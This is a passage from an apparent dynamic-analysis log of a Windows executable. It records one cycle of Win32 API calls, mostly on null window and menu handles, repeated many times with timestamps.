returned 0 [0100.627] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.627] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.627] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.627] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.627] GetMenu (hWnd=0x0) returned 0x0 [0100.627] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.627] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.627] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.627] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.627] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.627] GetStockObject (i=6) returned 0x1b00018 [0100.627] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.627] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.627] PathFileExistsW (pszPath=0x0) returned 0 [0100.627] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.627] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.627] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.627] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.627] GetMenu (hWnd=0x0) returned 0x0 [0100.627] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x496) returned -1 [0100.627] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.627] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.627] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.627] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.627] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.628] GetStockObject (i=6) returned 0x1b00018 [0100.628] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.628] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.628] PathFileExistsW (pszPath=0x0) returned 0 [0100.628] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.628] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.628] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.628] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.628] GetMenu (hWnd=0x0) returned 0x0 [0100.628] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.628] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.628] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.628] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.628] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.628] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.628] GetStockObject (i=6) returned 0x1b00018 [0100.628] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.628] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.628] PathFileExistsW (pszPath=0x0) returned 0 [0100.628] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.628] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.628] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.628] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.628] GetMenu (hWnd=0x0) returned 0x0 [0100.628] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.628] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.628] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.628] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.628] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.628] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.629] GetStockObject (i=6) returned 0x1b00018 [0100.629] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.629] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.629] PathFileExistsW (pszPath=0x0) returned 0 [0100.629] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.629] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.629] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.629] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.629] GetMenu (hWnd=0x0) returned 0x0 [0100.629] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.629] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.629] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.629] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.629] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.629] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.629] GetStockObject (i=6) returned 0x1b00018 [0100.629] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.629] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.629] PathFileExistsW (pszPath=0x0) returned 0 [0100.629] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.629] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.629] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.629] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.629] GetMenu (hWnd=0x0) returned 0x0 [0100.629] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.629] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.629] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.629] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.629] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.629] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.629] GetStockObject (i=6) returned 0x1b00018 [0100.629] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.629] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.629] PathFileExistsW (pszPath=0x0) returned 0 [0100.629] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.630] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.630] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.630] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.630] GetMenu (hWnd=0x0) returned 0x0 [0100.630] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x15d) returned -1 [0100.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.630] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.630] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.630] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.630] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.630] GetStockObject (i=6) returned 0x1b00018 [0100.630] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.630] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.630] PathFileExistsW (pszPath=0x0) returned 0 [0100.630] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.630] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.630] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.630] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.630] GetMenu (hWnd=0x0) returned 0x0 [0100.630] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.630] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.630] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.630] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.630] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.630] GetStockObject (i=6) returned 0x1b00018 [0100.630] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.630] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.630] PathFileExistsW (pszPath=0x0) returned 0 [0100.630] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.630] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.630] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.630] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.630] GetMenu (hWnd=0x0) returned 0x0 [0100.630] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.630] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.631] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.631] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.631] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.631] GetStockObject (i=6) returned 0x1b00018 [0100.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.631] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.631] PathFileExistsW (pszPath=0x0) returned 0 [0100.631] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.631] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.631] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.631] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.631] GetMenu (hWnd=0x0) returned 0x0 [0100.631] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.631] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.631] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.631] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.631] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.631] GetStockObject (i=6) returned 0x1b00018 [0100.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.631] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.631] PathFileExistsW (pszPath=0x0) returned 0 [0100.631] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.631] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.631] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.631] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.631] GetMenu (hWnd=0x0) returned 0x0 [0100.631] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.631] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.631] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.631] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.631] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.631] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.631] GetStockObject (i=6) returned 0x1b00018 [0100.631] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.632] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.632] PathFileExistsW (pszPath=0x0) returned 0 [0100.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.632] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.632] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.632] GetMenu (hWnd=0x0) returned 0x0 [0100.632] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x38c) returned -1 [0100.632] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.632] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.632] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.632] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.632] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.632] GetStockObject (i=6) returned 0x1b00018 [0100.632] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.632] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.632] PathFileExistsW (pszPath=0x0) returned 0 [0100.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.632] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.632] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.632] GetMenu (hWnd=0x0) returned 0x0 [0100.632] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.632] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.632] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.632] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.632] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.632] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.632] GetStockObject (i=6) returned 0x1b00018 [0100.632] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.632] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.632] PathFileExistsW (pszPath=0x0) returned 0 [0100.632] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.632] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.632] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.632] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.633] GetMenu (hWnd=0x0) returned 0x0 [0100.633] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.633] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.633] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.633] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.633] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.633] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.633] GetStockObject (i=6) returned 0x1b00018 [0100.633] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.633] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.633] PathFileExistsW (pszPath=0x0) returned 0 [0100.633] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.633] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.633] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.633] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.633] GetMenu (hWnd=0x0) returned 0x0 [0100.633] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.633] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.633] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.633] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.633] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.633] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.633] GetStockObject (i=6) returned 0x1b00018 [0100.633] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.633] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.633] PathFileExistsW (pszPath=0x0) returned 0 [0100.633] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.633] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.633] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.633] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.633] GetMenu (hWnd=0x0) returned 0x0 [0100.633] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.633] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.633] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.633] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.633] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.634] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.634] GetStockObject (i=6) returned 0x1b00018 [0100.634] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.634] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.634] PathFileExistsW (pszPath=0x0) returned 0 [0100.634] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.634] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.634] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.634] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.634] GetMenu (hWnd=0x0) returned 0x0 [0100.634] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x16d) returned -1 [0100.634] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.634] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.634] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.634] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.634] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.634] GetStockObject (i=6) returned 0x1b00018 [0100.634] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.634] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.634] PathFileExistsW (pszPath=0x0) returned 0 [0100.634] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.634] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.634] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.634] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.634] GetMenu (hWnd=0x0) returned 0x0 [0100.634] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.634] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.634] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.634] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.634] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.634] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.634] GetStockObject (i=6) returned 0x1b00018 [0100.634] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.634] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.634] PathFileExistsW (pszPath=0x0) returned 0 [0100.634] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.634] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.635] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.635] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.635] GetMenu (hWnd=0x0) returned 0x0 [0100.635] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.635] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.635] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.635] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.635] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.635] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.635] GetStockObject (i=6) returned 0x1b00018 [0100.635] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.635] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.635] PathFileExistsW (pszPath=0x0) returned 0 [0100.635] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.635] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.635] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.635] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.635] GetMenu (hWnd=0x0) returned 0x0 [0100.635] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.635] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.635] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.635] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.635] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.635] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.635] GetStockObject (i=6) 